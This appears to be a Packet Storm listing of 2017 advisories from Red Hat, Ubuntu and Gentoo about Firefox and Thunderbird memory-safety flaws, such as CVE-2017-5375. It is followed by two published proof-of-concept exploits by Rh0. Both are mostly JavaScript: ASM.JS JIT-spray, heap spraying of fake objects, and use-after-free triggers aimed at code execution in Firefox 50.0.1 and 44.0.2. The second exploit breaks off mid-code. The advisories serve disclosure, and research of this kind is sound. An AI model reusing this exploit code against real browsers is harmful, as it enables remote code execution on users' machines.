+-----+

Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com

    

- Vulnerability information (F140896)

Red Hat Security Advisory 2017-0238-01 (PacketStormID:F140896)
2017-02-02 00:00:00
Red Hat  
advisory,web,arbitrary
linux,redhat
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396

Red Hat Security Advisory 2017-0238-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 45.7.0. Security Fix: Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code with the privileges of the user running Thunderbird.

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: thunderbird security update
Advisory ID:       RHSA-2017:0238-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2017-0238.html
Issue date:        2017-02-02
CVE Names:         CVE-2017-5373 CVE-2017-5375 CVE-2017-5376 
                   CVE-2017-5378 CVE-2017-5380 CVE-2017-5383 
                   CVE-2017-5390 CVE-2017-5396 
=====================================================================

1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 5,
Red Hat Enterprise Linux 6, and Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Optional Productivity Applications (v. 5 server) - i386, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 45.7.0.

Security Fix(es):

* Multiple flaws were found in the processing of malformed web content. A
web page containing malicious content could cause Thunderbird to crash or,
potentially, execute arbitrary code with the privileges of the user running
Thunderbird. (CVE-2017-5373, CVE-2017-5375, CVE-2017-5376, CVE-2017-5378,
CVE-2017-5380, CVE-2017-5383, CVE-2017-5390, CVE-2017-5396)

Red Hat would like to thank the Mozilla project for reporting these issues.
Upstream acknowledges Jann Horn, Filipe Gomes, Nils, Armin Razmjou,
Christian Holler, Gary Kwong, Andre Bargull, Jan de Mooij, Tom Schuster,
Oriol, Rh0, Nicolas Gregoire, and Jerri Rice as the original reporters.

4. Solution:

For details on how to apply this update, which includes the changes
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1415924 - CVE-2017-5373 Mozilla: Memory safety bugs fixed in Firefox 51 and Firefox ESR 45.7 (MFSA 2017-01)
1416271 - CVE-2017-5375 Mozilla: Excessive JIT code allocation allows bypass of ASLR and DEP (MFSA 2017-02)
1416272 - CVE-2017-5376 Mozilla: Use-after-free in XSL (MFSA 2017-02)
1416273 - CVE-2017-5378 Mozilla: Pointer and frame data leakage of Javascript objects (MFSA 2017-02)
1416274 - CVE-2017-5380 Mozilla: Potential use-after-free during DOM manipulations (MFSA 2017-02)
1416279 - CVE-2017-5390 Mozilla: Insecure communication methods in Developer Tools JSON viewer (MFSA 2017-02)
1416280 - CVE-2017-5396 Mozilla: Use-after-free with Media Decoder (MFSA 2017-02)
1416281 - CVE-2017-5383 Mozilla: Location bar spoofing with unicode characters (MFSA 2017-02)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
thunderbird-45.7.0-1.el5_11.src.rpm

i386:
thunderbird-45.7.0-1.el5_11.i386.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
thunderbird-45.7.0-1.el5_11.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Optional Productivity Applications (v. 5 server):

Source:
thunderbird-45.7.0-1.el5_11.src.rpm

i386:
thunderbird-45.7.0-1.el5_11.i386.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.i386.rpm

x86_64:
thunderbird-45.7.0-1.el5_11.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el5_11.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

ppc64:
thunderbird-45.7.0-1.el6_8.ppc64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.ppc64.rpm

s390x:
thunderbird-45.7.0-1.el6_8.s390x.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.s390x.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
thunderbird-45.7.0-1.el6_8.src.rpm

i386:
thunderbird-45.7.0-1.el6_8.i686.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.i686.rpm

x86_64:
thunderbird-45.7.0-1.el6_8.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el6_8.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

aarch64:
thunderbird-45.7.0-1.el7_3.aarch64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.aarch64.rpm

ppc64le:
thunderbird-45.7.0-1.el7_3.ppc64le.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.ppc64le.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
thunderbird-45.7.0-1.el7_3.src.rpm

x86_64:
thunderbird-45.7.0-1.el7_3.x86_64.rpm
thunderbird-debuginfo-45.7.0-1.el7_3.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2017-5373
https://access.redhat.com/security/cve/CVE-2017-5375
https://access.redhat.com/security/cve/CVE-2017-5376
https://access.redhat.com/security/cve/CVE-2017-5378
https://access.redhat.com/security/cve/CVE-2017-5380
https://access.redhat.com/security/cve/CVE-2017-5383
https://access.redhat.com/security/cve/CVE-2017-5390
https://access.redhat.com/security/cve/CVE-2017-5396
https://access.redhat.com/security/updates/classification/#important
https://www.mozilla.org/en-US/security/advisories/mfsa2017-03/

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2017 Red Hat, Inc.
    

- Vulnerability information (F140946)

Ubuntu Security Notice USN-3175-2 (PacketStormID:F140946)
2017-02-07 00:00:00
Ubuntu  security.ubuntu.com
advisory,denial of service,arbitrary,vulnerability
linux,ubuntu
CVE-2017-5375,CVE-2017-5376,CVE-2017-5377,CVE-2017-5378,CVE-2017-5379,CVE-2017-5380,CVE-2017-5381,CVE-2017-5382,CVE-2017-5383,CVE-2017-5384,CVE-2017-5385,CVE-2017-5386,CVE-2017-5387,CVE-2017-5388,CVE-2017-5389,CVE-2017-5390,CVE-2017-5391,CVE-2017-5393,CVE-2017-5396

Ubuntu Security Notice 3175-2 - USN-3175-1 fixed vulnerabilities in Firefox. The update caused a regression on systems where the AppArmor profile for Firefox is set to enforce mode. This update fixes the problem. Multiple memory safety issues were discovered in Firefox. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code. JIT code allocation can allow a bypass of ASLR protections in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Nicolas Grégoire discovered a use-after-free when manipulating XSL in XSLT documents in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Atte Kettunen discovered a memory corruption issue in Skia in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. Various other issues were also addressed.

==========================================================================
Ubuntu Security Notice USN-3175-2
February 06, 2017

firefox regression
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.10
- Ubuntu 16.04 LTS
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS

Summary:

USN-3175-1 introduced a regression in Firefox.

Software Description:
- firefox: Mozilla Open Source web browser

Details:

USN-3175-1 fixed vulnerabilities in Firefox. The update caused a
regression on systems where the AppArmor profile for Firefox is set to
enforce mode. This update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Multiple memory safety issues were discovered in Firefox. If a user were
 tricked in to opening a specially crafted website, an attacker could
 potentially exploit these to cause a denial of service via application
 crash, or execute arbitrary code. (CVE-2017-5373, CVE-2017-5374)
 
 JIT code allocation can allow a bypass of ASLR protections in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5375)
 
 Nicolas Grégoire discovered a use-after-free when manipulating XSL in
 XSLT documents in some circumstances. If a user were tricked in to opening
 a specially crafted website, an attacker could potentially exploit this to
 cause a denial of service via application crash, or execute arbitrary
 code. (CVE-2017-5376)
 
 Atte Kettunen discovered a memory corruption issue in Skia in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5377)
 
 Jann Horn discovered that an object's address could be discovered through
 hashed codes of JavaScript objects shared between pages. If a user were
 tricked in to opening a specially crafted website, an attacker could
 potentially exploit this to obtain sensitive information. (CVE-2017-5378)
 
 A use-after-free was discovered in Web Animations in some circumstances.
 If a user were tricked in to opening a specially crafted website, an
 attacker could potentially exploit this to cause a denial of service via
 application crash, or execute arbitrary code. (CVE-2017-5379)
 
 A use-after-free was discovered during DOM manipulation of SVG content in
 some circumstances. If a user were tricked in to opening a specially
 crafted website, an attacker could potentially exploit this to cause a
 denial of service via application crash, or execute arbitrary code.
 (CVE-2017-5380)
 
 Jann Horn discovered that the "export" function in the Certificate Viewer
 can force local filesystem navigation when the Common Name contains
 slashes. If a user were tricked in to exporting a specially crafted
 certificate, an attacker could potentially exploit this to save content
 with arbitrary filenames in unsafe locations. (CVE-2017-5381)
 
 Jerri Rice discovered that the Feed preview for RSS feeds can be used to
 capture errors and exceptions generated by privileged content. An attacker
 could potentially exploit this to obtain sensitive information.
 (CVE-2017-5382)
 
 Armin Razmjou discovered that certain unicode glyphs do not trigger
 punycode display. An attacker could potentially exploit this to spoof the
 URL bar contents. (CVE-2017-5383)
 
 Paul Stone and Alex Chapman discovered that the full URL path is exposed
 to JavaScript functions specified by Proxy Auto-Config (PAC) files. If a
 user has enabled Web Proxy Auto Detect (WPAD), an attacker could
 potentially exploit this to obtain sensitive information. (CVE-2017-5384)
 
 Muneaki Nishimura discovered that data sent in multipart channels will
 ignore the Referrer-Policy response headers. An attacker could potentially
 exploit this to obtain sensitive information. (CVE-2017-5385)
 
 Muneaki Nishimura discovered that WebExtensions can affect other
 extensions using the data: protocol. If a user were tricked in to
 installing a specially crafted addon, an attacker could potentially
 exploit this to obtain sensitive information or gain additional
 privileges. (CVE-2017-5386)
 
 Mustafa Hasan discovered that the existence of local files can be
 determined using the <track> element. An attacker could potentially
 exploit this to obtain sensitive information. (CVE-2017-5387)
 
 Cullen Jennings discovered that WebRTC can be used to generate large
 amounts of UDP traffic. An attacker could potentially exploit this to
 conduct Distributed Denial-of-Service (DDOS) attacks. (CVE-2017-5388)
 
 Kris Maglione discovered that WebExtensions can use the mozAddonManager
 API by modifying the CSP headers on sites with the appropriate permissions
 and then using host requests to redirect script loads to a malicious site.
 If a user were tricked in to installing a specially crafted addon, an
 attacker could potentially exploit this to install additional addons
 without user permission. (CVE-2017-5389)
 
 Jerri Rice discovered insecure communication methods in the Dev Tools JSON
 Viewer. An attacker could potentially exploit this to gain additional
 privileges. (CVE-2017-5390)
 
 Jerri Rice discovered that about: pages used by content can load
 privileged about: pages in iframes. An attacker could potentially exploit
 this to gain additional privileges, in combination with a
 content-injection bug in one of those about: pages. (CVE-2017-5391)
 
 Stuart Colville discovered that mozAddonManager allows for the
 installation of extensions from the CDN for addons.mozilla.org, a publicly
 accessible site. If a user were tricked in to installing a specially
 crafted addon, an attacker could potentially exploit this, in combination
 with a cross-site scripting (XSS) attack on Mozilla's AMO sites, to
 install additional addons. (CVE-2017-5393)
 
 Filipe Gomes discovered a use-after-free in the media decoder in some
 circumstances. If a user were tricked in to opening a specially crafted
 website, an attacker could potentially exploit this to cause a denial of
 service via application crash, or execute arbitrary code. (CVE-2017-5396)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 16.10:
  firefox                         51.0.1+build2-0ubuntu0.16.10.2

Ubuntu 16.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.16.04.2

Ubuntu 14.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.14.04.2

Ubuntu 12.04 LTS:
  firefox                         51.0.1+build2-0ubuntu0.12.04.2

After a standard system update you need to restart Firefox to make
all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-3175-2
  http://www.ubuntu.com/usn/usn-3175-1
  https://launchpad.net/bugs/1659922

Package Information:
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.10.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.16.04.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.14.04.2
  https://launchpad.net/ubuntu/+source/firefox/51.0.1+build2-0ubuntu0.12.04.2


    

- Vulnerability information (F141190)

Gentoo Linux Security Advisory 201702-22 (PacketStormID:F141190)
2017-02-21 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5386,CVE-2017-5390,CVE-2017-5396

Gentoo Linux Security Advisory 201702-22 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which may allow execution of arbitrary code. Versions less than 45.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201702-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal
    Title: Mozilla Firefox: Multiple vulnerabilities
     Date: February 20, 2017
     Bugs: #607138
       ID: 201702-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Mozilla Firefox, the worst
of which may allow execution of arbitrary code.

Background
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla
Project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  www-client/firefox           < 45.7.0                  >= 45.7.0
  2  www-client/firefox-bin       < 45.7.0                  >= 45.7.0
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker could possibly execute arbitrary code with the
privileges of the process, cause a Denial of Service condition, bypass
access restriction, access otherwise protected information, or spoof
content via multiple vectors.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-client/firefox-45.7.0"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-45.7.0"

References
==========

[  1 ] CVE-2017-5373
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5373
[  2 ] CVE-2017-5375
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5375
[  3 ] CVE-2017-5376
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5376
[  4 ] CVE-2017-5378
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5378
[  5 ] CVE-2017-5380
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5380
[  6 ] CVE-2017-5383
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5383
[  7 ] CVE-2017-5386
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5386
[  8 ] CVE-2017-5390
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5390
[  9 ] CVE-2017-5396
       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5396
[ 10 ] Mozilla Foundation Security Advisory 2017-02
       https://www.mozilla.org/en-US/security/advisories/mfsa2017-02/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201702-22

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



    

- Vulnerability information (F141182)

Gentoo Linux Security Advisory 201702-13 (PacketStormID:F141182)
2017-02-21 00:00:00
Gentoo  security.gentoo.org
advisory,arbitrary,vulnerability
linux,gentoo
CVE-2017-5373,CVE-2017-5375,CVE-2017-5376,CVE-2017-5378,CVE-2017-5380,CVE-2017-5383,CVE-2017-5390,CVE-2017-5396

Gentoo Linux Security Advisory 201702-13 - Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could lead to the execution of arbitrary code. Versions less than 45.7.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 201702-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High
    Title: Mozilla Thunderbird: Multiple vulnerabilities
     Date: February 20, 2017
     Bugs: #607310
       ID: 201702-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been found in Mozilla Thunderbird, the
worst of which could lead to the execution of arbitrary code.

Background
==========

Mozilla Thunderbird is a popular open-source email client from the
Mozilla project.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  mail-client/thunderbird      < 45.7.0                  >= 45.7.0
  2  mail-client/thunderbird-bin
                                  < 45.7.0                  >= 45.7.0
    -------------------------------------------------------------------
     2 affected packages

Description
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.
Please review the CVE identifiers referenced below for details.

Impact
======

A remote attacker, by enticing a user to open a specially crafted email
or web page, could possibly execute arbitrary code with the privileges
of the process or cause a Denial of Service condition.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-45.7.0"


All Mozilla Thunderbird binary users should upgrade to the latest
version:

  # emerge --sync
  # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-45.7.0"

References
==========

[ 1 ] CVE-2017-5373
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5373
[ 2 ] CVE-2017-5375
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5375
[ 3 ] CVE-2017-5376
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5376
[ 4 ] CVE-2017-5378
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5378
[ 5 ] CVE-2017-5380
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5380
[ 6 ] CVE-2017-5383
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5383
[ 7 ] CVE-2017-5390
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5390
[ 8 ] CVE-2017-5396
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-5396
[ 9 ] Mozilla Foundation Security Advisory 2017-03
      https://www.mozilla.org/en-US/security/advisories/mfsa2017-03/

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

 https://security.gentoo.org/glsa/201702-13

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



    

- Vulnerability information (F143373)

Firefox 50.0.1 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F143373)
2017-07-14 00:00:00
Rh0  
exploit
CVE-2016-9079,CVE-2017-5375

Firefox version 50.0.1 full ASLR and DEP bypass exploit using ASM.JS JIT-spray.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    PoC Exploit against Firefox 50.0.1 (CVE-2016-9079 - Tor Browser 0day)
 
    Tested on:
 
    Release 50.0.1 32-bit - Windows 8.1 / Windows 10
    https://ftp.mozilla.org/pub/firefox/releases/50.0.1/win32/en-US/Firefox%20Setup%2050.0.1.exe
 
    Howto:
 
    1) serve PoC over network and open it in Firefox 50.0.1 32-bit
    2) if you don't see cmd.exe, open processexplorer and verify that cmd.exe was spawned by firefox.exe
 
    A successful exploit attempt should pop cmd.exe
 
    Writeup: https://rh0dev.github.io/blog/2017/the-return-of-the-jit/
     
    (C) Rh0
 
    Jul. 13, 2017
 
-->
 
<script async>
function asm_js_module(){
    "use asm";
    /* huge jitted nop sled */
    function payload_code(){
        var val = 0;
        /* 3 byte VirtualAlloc RWX stager */
        /* $ msfvenom --payload windows/exec CMD=cmd.exe EXITFUNC=seh */
 
        return val|0;
    }
    return payload_code 
}
</script>
 
<script>
function spray_asm_js_modules(){
    sprayed = []
    for (var i=0; i<= 0x1800; i++){
        sprayed[i] = asm_js_module()
    }
}
 
/* heap spray inspired by skylined */
function heap_spray_fake_objects(){
    var heap = []
    var current_address = 0x08000000
    var block_size = 0x1000000
    while(current_address < object_target_address){
        var heap_block = new Uint32Array(block_size/4 - 0x100)
        for (var offset = 0; offset < block_size; offset += 0x100000){
 
            /* fake object target = ecx + 0x88 and fake vtable*/
            heap_block[offset/4 + 0x00/4] = object_target_address
            /* self + 4 */
            heap_block[offset/4 + 0x14/4] = object_target_address
            /* the path to EIP */
            heap_block[offset/4 + 0x18/4] = 4
            heap_block[offset/4 + 0xac/4] = 1
            /* fake virtual function --> JIT target */
            heap_block[offset/4 + 0x138/4] = jit_payload_target 
        }
        heap.push(heap_block)
        current_address += block_size
    }
    return heap
}
 
/* address of fake object */
object_target_address = 0x30300000
 
/* address of our jitted shellcode */
jit_payload_target = 0x1c1c0054
 
/* ASM.JS JIT Spray */
spray_asm_js_modules()
 
/* Spray fake objects */
heap = heap_spray_fake_objects()
 
/* -----> */
/* bug trigger ripped from bugzilla report */
var worker = new Worker('data:javascript,self.onmessage=function(msg){postMessage("one");postMessage("two");};');
worker.postMessage("zero");
var svgns = 'http://www.w3.org/2000/svg';
var heap80 = new Array(0x1000);
var heap100 = new Array(0x4000);
var block80 = new ArrayBuffer(0x80);
var block100 = new ArrayBuffer(0x100);
var sprayBase = undefined;
var arrBase = undefined;
var animateX = undefined;
var containerA = undefined;
var offset = 0x88 // Firefox 50.0.1
 
var exploit = function(){
    var u32 = new Uint32Array(block80)
 
    u32[0x4] = arrBase - offset;
    u32[0xa] = arrBase - offset;
    u32[0x10] = arrBase - offset;
 
    for(i = heap100.length/2; i < heap100.length; i++)
    {
      heap100[i] = block100.slice(0)
    }
 
    for(i = 0; i < heap80.length/2; i++)
    {
      heap80[i] = block80.slice(0)
    }
 
    animateX.setAttribute('begin', '59s')
    animateX.setAttribute('begin', '58s')
 
    for(i = heap80.length/2; i < heap80.length; i++)
    {
      heap80[i] = block80.slice(0)
    }
 
    for(i = heap100.length/2; i < heap100.length; i++)
    {
      heap100[i] = block100.slice(0)
    }
 
    animateX.setAttribute('begin', '10s')
    animateX.setAttribute('begin', '9s')
    containerA.pauseAnimations();
}
 
worker.onmessage = function(e) {arrBase=object_target_address; exploit()}
//worker.onmessage = function(e) {arrBase=0x30300000; exploit()}
 
var trigger = function(){
    containerA = document.createElementNS(svgns, 'svg')
    var containerB = document.createElementNS(svgns, 'svg');
    animateX = document.createElementNS(svgns, 'animate')
    var animateA = document.createElementNS(svgns, 'animate')
    var animateB = document.createElementNS(svgns, 'animate')
    var animateC = document.createElementNS(svgns, 'animate')
    var idA = "ia";
    var idC = "ic";
    animateA.setAttribute('id', idA);
    animateA.setAttribute('end', '50s');
    animateB.setAttribute('begin', '60s');
    animateB.setAttribute('end', idC + '.end');
    animateC.setAttribute('id', idC);
    animateC.setAttribute('end', idA + '.end');
    containerA.appendChild(animateX)
    containerA.appendChild(animateA)
    containerA.appendChild(animateB)
    containerB.appendChild(animateC)
    document.body.appendChild(containerA);
    document.body.appendChild(containerB);
}
 
window.onload = trigger;
setInterval("window.location.reload()", 3000)
/* <----- */
 
</script>

    

- Vulnerability information (F146819)

Firefox 44.0.2 ASM.JS JIT-Spray Remote Code Execution (PacketStormID:F146819)
2018-03-16 00:00:00
Rh0  
exploit,remote,code execution
CVE-2016-1960,CVE-2017-5375

Firefox version 44.0.2 ASM.JS JIT-Spray remote code execution exploit.

<!DOCTYPE HTML>
 
<!--
 
    FULL ASLR AND DEP BYPASS USING ASM.JS JIT SPRAY (CVE-2017-5375)
    *PoC* Exploit against Firefox 44.0.2 (CVE-2016-1960)
    ASM.JS float constant pool JIT-Spray special shown at OffensiveCon 2018
 
    Tested on:
    Firefox 44.0.2 32-bit - Windows 10 1709
    https://ftp.mozilla.org/pub/firefox/releases/44.0.2/win32/en-US/Firefox%20Setup%2044.0.2.exe
 
    Howto:
    1) serve PoC over network and open it in Firefox 44.0.2 32-bit
    2) A successful exploit attempt should pop calc.exe
 
    Mozilla Bug Report:
    https://bugzilla.mozilla.org/show_bug.cgi?id=1246014
 
 
    Writeup: 
    https://rh0dev.github.io/blog/2018/more-on-asm-dot-js-payloads-and-exploitation/
 
 
    - For research purposes only -
     
    (C) Rh0
 
    Mar. 13, 2018
 
    Notes:
    *) very similar to CVE-2016-2819, but still different:
    *) this PoC (CVE-2016-1960) does trigger in 44.0.2 but not in 46.0.1
       because in 46.0.1 it is already fixed.
    *) CVE-2016-2819 does trigger the same bug in 44.0.2 and 46.0.1 because it
       was fixed in Firefox > 46.0.1
 
-->
 
<title>CVE-2016-1960 and ASM.JS JIT-Spray</title>
<head>
<meta charset=UTF-8 />
<script>
"use strict"
 
var Exploit = function(){
    this.asmjs = new Asmjs()
    this.heap = new Heap()
}
 
Exploit.prototype.go = function(){
    /* target address of fake node object */
    var node_target_addr = 0x20200000 
 
    /* target address of asm.js float pool payload*/
    var target_eip = 0x3c3c1dc8
 
    /* spray fake Node objects */
    this.heap.spray(node_target_addr, target_eip)
 
    /* spray asm.js float constant pools */
    this.asmjs.spray_float_payload(0x1800)
 
    /* go! */
    this.trigger_vuln(node_target_addr)
};
 
 
Exploit.prototype.trigger_vuln = function(node_ptr){
    document.body.innerHTML = '<table><svg><div id="AAAA">'
    this.heap.gc()
    var a = new Array() 
    for (var i=0; i < 0x11000; i++){
        /* array element (Node object ptr) control with integer underflow */
        a[i] = new Uint32Array(0x100/4)
        for (var j=0; j<0x100/4; j++)
            a[i][j] = node_ptr 
    }
 
    /* original crashing testcase
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td</style>';
    */
 
    /* easier to exploit codepath */
    document.getElementById('AAAA').innerHTML = '<title><template><td><tr><title><i></tr><style>td<DD>';
 
    window.location.reload()
};
 
 
var Asmjs = function(){};
 
Asmjs.prototype.asm_js_module = function(stdlib, ffi){
    "use asm"
    var foo = ffi.foo
    function payload(){
        var val = 0.0
        /* Fx 44.0.2 float constant pool of size 0xc0 is at 0xXXXX1dc8*/
        val = +foo(
            // $ msfvenom --payload windows/exec CMD=calc.exe # transformed with sc2asmjs.py
        )
        return +val;
    }
    return payload
};
 
Asmjs.prototype.spray_float_payload = function(regions){
    this.modules = new Array(regions).fill(null).map(
        region => this.asm_js_module(window, {foo: () => 0})
    )
};
 
